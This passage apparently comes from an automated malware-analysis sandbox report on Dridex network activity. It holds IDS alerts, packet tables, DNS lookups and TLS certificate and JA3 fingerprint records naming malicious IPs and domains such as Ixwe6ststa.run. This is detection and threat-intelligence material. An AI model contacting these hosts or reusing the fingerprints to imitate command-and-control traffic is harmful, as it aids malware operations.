                                                                                                  01/11/21-18:26:13.475632TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:13.475632TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493685.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:14.534567TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:15.061046TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:15.572665TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:15.572665TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493725.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:16.626164TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:17.153177TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:17.677211TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:17.677211TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493765.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:18.700203TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:19.223805TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:19.739379TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:19.739379TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493805.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:20.774576TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:21.299760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:21.828358TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:21.828358TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493845.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:22.866516TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:23.390953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:23.974344TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:23.974344TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493885.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:25.020010TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:25.548258TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:26.061729TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:26.061729TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493925.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:27.076272TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:27.595007TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:28.121288TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:28.121288TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493965.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:29.155453TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:29.673072TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:30.193343TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:30.193343TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494005.100.228.233192.168.2.22

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 11, 2021 18:24:15.805233002 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.856887102 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.857145071 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.871679068 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.923337936 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.928081036 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.928123951 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.928158045 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.928247929 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.928297997 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.928306103 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.937534094 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:15.989511967 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:15.989772081 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.536842108 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.601531982 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601598024 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601650000 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601702929 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601774931 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601851940 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.601871014 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601893902 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.601900101 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.601917028 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601950884 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.601978064 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.601982117 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.602036953 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.602046013 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.602092981 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.602104902 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.602176905 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.605844021 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.655772924 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.655844927 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.655908108 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.655972004 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656034946 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656095982 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656155109 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656219959 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656281948 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656342983 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656403065 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656464100 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656522989 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656558037 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.656583071 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656644106 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656712055 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656723976 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.656776905 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.656840086 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.656908035 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.657210112 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.662086010 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708365917 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708441973 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708501101 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708534956 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708569050 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708576918 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708584070 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708628893 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708652020 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708686113 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708693981 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708743095 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708760977 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708801031 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708802938 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708864927 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708882093 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708920002 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.708924055 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708981037 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.708988905 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709043026 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709047079 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709106922 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709146976 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709170103 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709182978 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709207058 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709265947 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709283113 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709330082 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709333897 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709414959 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709453106 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709517002 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.709523916 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709539890 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.709583044 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.714025974 CET49165443192.168.2.22185.2.4.104
                                                                                                  Jan 11, 2021 18:24:17.761013985 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.761092901 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.761128902 CET44349165185.2.4.104192.168.2.22
                                                                                                  Jan 11, 2021 18:24:17.761172056 CET44349165185.2.4.104192.168.2.22

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 11, 2021 18:24:15.723892927 CET5219753192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:15.795281887 CET53521978.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:16.301872015 CET5309953192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:16.350070953 CET53530998.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:16.362349987 CET5283853192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:16.410430908 CET53528388.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:16.935308933 CET6120053192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:16.984822035 CET53612008.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:16.996391058 CET4954853192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:17.044800997 CET53495488.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:54.643861055 CET5562753192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:54.691875935 CET53556278.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:54.717423916 CET5600953192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:54.773591042 CET53560098.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:56.052653074 CET6186553192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:56.100594997 CET53618658.8.8.8192.168.2.22
                                                                                                  Jan 11, 2021 18:24:56.256597996 CET5517153192.168.2.228.8.8.8
                                                                                                  Jan 11, 2021 18:24:56.307303905 CET53551718.8.8.8192.168.2.22

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jan 11, 2021 18:24:15.723892927 CET192.168.2.228.8.8.80x15d4Standard query (0)www5.ritamartins.ptA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jan 11, 2021 18:24:15.795281887 CET8.8.8.8192.168.2.220x15d4No error (0)www5.ritamartins.pt185.2.4.104A (IP address)IN (0x0001)
                                                                                                  Jan 11, 2021 18:24:56.100594997 CET8.8.8.8192.168.2.220xfd3fNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                  Jan 11, 2021 18:24:56.100594997 CET8.8.8.8192.168.2.220xfd3fNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                  Jan 11, 2021 18:24:56.307303905 CET8.8.8.8192.168.2.220x30c4No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                  Jan 11, 2021 18:24:56.307303905 CET8.8.8.8192.168.2.220x30c4No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)

                                                                                                  HTTPS Packets

                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                  Jan 11, 2021 18:24:15.928158045 CET185.2.4.104443192.168.2.2249165CN=www7.ritamartins.pt CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 20 02:55:56 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 18 02:55:56 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                  CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021
                                                                                                  Jan 11, 2021 18:24:22.185983896 CET77.220.64.37443192.168.2.2249168CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:25.150480032 CET77.220.64.37443192.168.2.2249172CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:27.237675905 CET77.220.64.37443192.168.2.2249176CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:29.355540037 CET77.220.64.37443192.168.2.2249180CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:31.461231947 CET77.220.64.37443192.168.2.2249184CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:33.536547899 CET77.220.64.37443192.168.2.2249188CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:35.675164938 CET77.220.64.37443192.168.2.2249192CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:37.721714020 CET77.220.64.37443192.168.2.2249196CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:41.352305889 CET77.220.64.37443192.168.2.2249200CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:43.441083908 CET77.220.64.37443192.168.2.2249204CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:45.827469110 CET77.220.64.37443192.168.2.2249208CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:47.954910040 CET77.220.64.37443192.168.2.2249212CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:50.044634104 CET77.220.64.37443192.168.2.2249216CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:52.163078070 CET77.220.64.37443192.168.2.2249220CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:54.272573948 CET77.220.64.37443192.168.2.2249224CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:56.597748041 CET77.220.64.37443192.168.2.2249230CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:24:59.430222034 CET77.220.64.37443192.168.2.2249234CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:01.516469002 CET77.220.64.37443192.168.2.2249238CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:03.316519976 CET77.220.64.37443192.168.2.2249242CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                  Jan 11, 2021 18:25:05.397773027 CET77.220.64.37443192.168.2.2249246CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
